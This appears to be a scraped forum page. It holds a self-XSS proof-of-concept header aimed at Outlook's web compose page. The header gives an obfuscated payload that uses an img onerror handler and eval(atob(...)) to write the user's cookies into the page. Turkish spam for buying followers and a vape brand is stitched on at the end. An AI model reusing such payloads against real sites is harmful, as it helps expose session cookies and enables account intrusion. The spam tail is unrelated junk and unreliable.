Outlook Offical

endLesS

Webmaster
<------------------ header data start ------------------- >

#############################################################

# Application Name : Outlook Offical

# Vulnerable Type : Self XSS

# Author : Bug Researchers

# Target : https://col127.mail.live.com/?page=Compose

# PoC: Special (01.11.15)

# Payload: <h1****<img src= alert(’<h1>xss’); <h1****<img onerror=eval(atob(’YWxlcnQoZG9jdW1lbnQud3JpdGUoZG9jdW1lbnQuY29va2llKSk=’)) src= asd<h1>/**/# ****
#############################################################

< ------------------- header data end of ------------------- >
 
bayigram takipçi satın al instagram beğeni satın al instagram takipçi satın al tiktok takipçi satın al Buy Followers haber
vozol puff
Geri
Üst